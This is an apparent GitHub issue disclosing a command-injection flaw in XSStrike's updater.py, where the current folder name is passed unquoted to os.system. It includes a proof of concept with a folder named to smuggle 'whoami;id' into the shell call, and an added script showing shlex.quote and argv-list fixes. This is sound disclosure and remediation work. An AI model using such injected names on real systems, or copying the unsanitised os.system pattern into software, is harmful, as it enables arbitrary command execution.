Vulnerability - Executing commands with unsanitized folder name
randsec opened this issue · 0 comments
### Impact

**What kind of vulnerability is it?**

Command execution over an unsanitized folder name.

### Vulnerable file

`XSStrike/core/updater.py`
### Vulnerable code

Lines 33, 34:

```python
os.system('git clone --quiet https://github.com/s0md3v/XSStrike %s' % (folder))
```

The `folder` variable is taken from the current directory.

Lines 26, 27:

```python
currentPath = os.getcwd().split('/')
folder = currentPath[-1]
```

If the user creates a folder with a Linux command in its name, the command will be executed.
### POC

Create a folder with a command injection in its name:

```shell
mkdir "command_injection;whoami;id"
```

Call `os.system`:

```python
os.system('git clone --quiet https://github.com/s0md3v/XSStrike %s' % (folder))
```

The system will clone the repo and then execute the commands `whoami; id`.

Below I wrote a POC. It's the same `os.system` call but modified to list the folder's contents instead of cloning a repo. It won't affect exploitability.
```python
import os

currentPath = os.getcwd().split('/')   # split the working directory path on '/'
folder = currentPath[-1]               # last component: the name of the current folder
print("[i] Current folder name: {}".format(folder))
print("[!] I'm going to call the os.system command!...")
os.system('ls %s' % (folder))          # folder name is interpolated unquoted into a shell command
```
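As an added example (not part of randsec's report and not XSStrike's own code), the script below places the vulnerable string-built command next to two hardened forms: the same string with `shlex.quote()` applied to the folder, and an argv list for `subprocess.run()` with `shell=False`. It tokenises each command string the way a POSIX shell would, so you can see that the unquoted folder name yields two `;` separators (three commands) while the quoted one yields none, and it runs a harmless stand-in for `git` (`echo`) through the argv form to show the folder name arriving as a single intact argument. The function names are mine; the folder name is the one from the report's PoC, used here only as a string constant (no directory is created). `punctuation_chars` tokenising requires Python 3.8 or later.

```python
import shlex
import subprocess

# Folder name taken from the report's PoC (`mkdir "command_injection;whoami;id"`);
# here it is just a constant, no directory is created.
HOSTILE_FOLDER = "command_injection;whoami;id"
REPO_URL = "https://github.com/s0md3v/XSStrike"


def vulnerable_command(folder: str) -> str:
    """Builds the exact string updater.py hands to os.system().
    It is only returned for inspection, never executed here."""
    return 'git clone --quiet %s %s' % (REPO_URL, folder)


def hardened_shell_command(folder: str) -> str:
    """Same string, but the folder is wrapped by shlex.quote() so /bin/sh sees it
    as one word. Acceptable only when a shell string is truly unavoidable."""
    return 'git clone --quiet %s %s' % (REPO_URL, shlex.quote(folder))


def hardened_argv(folder: str) -> list:
    """Preferred fix: an argv list for subprocess.run(..., shell=False).
    No shell parses the folder name, so ';' carries no special meaning."""
    return ['git', 'clone', '--quiet', REPO_URL, folder]


def shell_words(command: str) -> list:
    """Tokenise a command string the way a POSIX shell would, with ';' as a
    separate token (shlex punctuation_chars, Python 3.8+). This shows how
    many commands the shell would actually run for a given string."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def count_separators(command: str) -> int:
    """Number of ';' command separators a shell would act on."""
    return shell_words(command).count(';')


def run_argv_demo(folder: str) -> str:
    """Runs a harmless stand-in for git (echo) through the argv form.
    The folder comes back as one intact argument and nothing else runs."""
    result = subprocess.run(['echo', folder], capture_output=True, text=True, check=True)
    return result.stdout.rstrip('\n')


if __name__ == '__main__':
    bad = vulnerable_command(HOSTILE_FOLDER)
    print('[vulnerable]', bad)
    print('  shell would see', count_separators(bad), 'separators ->', shell_words(bad))
    good = hardened_shell_command(HOSTILE_FOLDER)
    print('[quoted]    ', good)
    print('  shell would see', count_separators(good), 'separators ->', shell_words(good))
    print('[argv]      ', hardened_argv(HOSTILE_FOLDER))
    print('  echo returned:', run_argv_demo(HOSTILE_FOLDER))
```

The argv form is the one to prefer in the updater: it removes the shell from the picture entirely, so no quoting rule has to be remembered for every future call site. `shlex.quote()` is the fallback for code that must stay a shell string.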